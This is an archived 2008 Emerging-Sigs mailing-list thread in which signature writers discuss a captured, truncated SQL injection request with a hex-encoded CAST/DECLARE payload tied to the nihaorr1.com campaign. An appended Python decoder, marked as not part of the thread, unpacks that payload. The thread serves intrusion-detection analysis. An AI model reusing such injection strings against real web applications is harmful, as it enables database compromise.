[Emerging-Sigs] Interesting SQL Injection attempts

Joel Esler joel.esler at sourcefire.com
Tue May 13 13:53:25 EDT 2008


This is the same sort of SQL injection from the nihaorr1.com stuff a
couple weeks ago.

J

On May 13, 2008, at 1:41 PM, Matt Jonkman wrote:

> This sent in from someone that's got to remain anonymous. Anyone have
> more info or theories?
>
> ----------
>
> A week or so ago I started seeing a lot of hits on sid 2008175 WEB
> Possible SQL Injection (varchar) from APNIC.  Today, I'm seeing lots
> of a broken variant (?) from more than one geo NIC with the first seen
> from RIPE.  It starts off the same as the 2008175 hits I've been
> monitoring but is somehow truncated.  It makes it as far as declaring
> the '@C varchar(25' then has another (hex) 3 I assume should lead into
> a x35 (char 5) but is overlaid with http header.  Different user-agent
> info also.  Odd!!!  xxx's denote sanitizing.  Any ideas what is going
> on?
>
>
>
> GET /xxxxx/apps/contact/xxx
> xxx.asp?id=86&subcatid=62
> ;DECLARE%20@S%20
> NVARCHAR(4000);S
> ET%20@S=CAST(0x4
> 400450043004C004
> 1005200450020004
> 0005400200076006
> 1007200630068006
> 1007200280032003
> 500350029002C004
> 0004300200076006
> 1007200630068006
> 1007200280032003
> 5003www.xxxx.u
> s HTTP/1.1..Acce
> pt: text/html, a
> pplication/xml;q
> =0.9, applicatio
> n/xhtml+xml, */*
> ;q=0.1..Accept-L
> anguage: en-gb..
> Accept-Encoding:
>  deflate..User-A
> gent: Mozilla/5.
> 0 (Windows NT 5.
> 1; U; en; rv:1.8
> .0) Gecko/200607
> 28 Firefox/1.5.0
>  Opera 9.25..Hos
> t: www.xxxxx.us
> ..Connection: Cl
> ose....
>
>
>
> -- 
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> --------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
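Added example, not part of the thread and not the posters' code: a small decoder for the CAST(0x...) argument in requests like the one quoted above. It decodes the hex run as UTF-16LE (the NVARCHAR encoding) and reports any dangling hex digits and the text that follows, which is how the truncation described in the post shows up. The function name, sample path and host are assumptions constructed to mirror the shape of the capture.

```python
import re
from urllib.parse import unquote

# Matches CAST(0x<hex>; the hex run ends at the first non-hex character.
CAST_HEX = re.compile(r"CAST\(0x([0-9A-Fa-f]*)", re.IGNORECASE)


def decode_cast_payload(request_uri):
    """Decode the hex argument of CAST(0x...) found in a request URI.

    Returns (decoded_text, leftover_hex, tail) or None when no CAST(0x...)
    is present. leftover_hex holds digits that do not form a complete
    UTF-16 code unit; tail is whatever follows the hex run.
    """
    uri = unquote(request_uri)  # turn %20 and friends back into characters
    match = CAST_HEX.search(uri)
    if match is None:
        return None
    hex_run = match.group(1)
    # NVARCHAR data is UTF-16LE: four hex digits per character.
    usable = len(hex_run) - (len(hex_run) % 4)
    text = bytes.fromhex(hex_run[:usable]).decode("utf-16-le", errors="replace")
    # Caveat: if the overlaid text starts with a-f or 0-9, those characters
    # are indistinguishable from payload hex and land in hex_run.
    return text, hex_run[usable:], uri[match.end():]


def looks_truncated(result):
    """A complete payload never ends in the middle of a UTF-16 code unit."""
    _text, leftover_hex, _tail = result
    return bool(leftover_hex)


# Constructed sample: the statement the post says the broken variant reaches,
# followed by one stray hex digit and a placeholder host overlaying the rest.
SAMPLE_SQL = "DECLARE @T varchar(255),@C varchar(25"
SAMPLE_URI = (
    "/app/page.asp?id=86&subcatid=62;DECLARE%20@S%20NVARCHAR(4000);"
    "SET%20@S=CAST(0x"
    + SAMPLE_SQL.encode("utf-16-le").hex().upper()
    + "3"
    + "www.example.invalid"
)

if __name__ == "__main__":
    decoded = decode_cast_payload(SAMPLE_URI)
    print("decoded  :", decoded[0])
    print("leftover :", decoded[1])
    print("tail     :", decoded[2])
    print("truncated:", looks_truncated(decoded))
```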


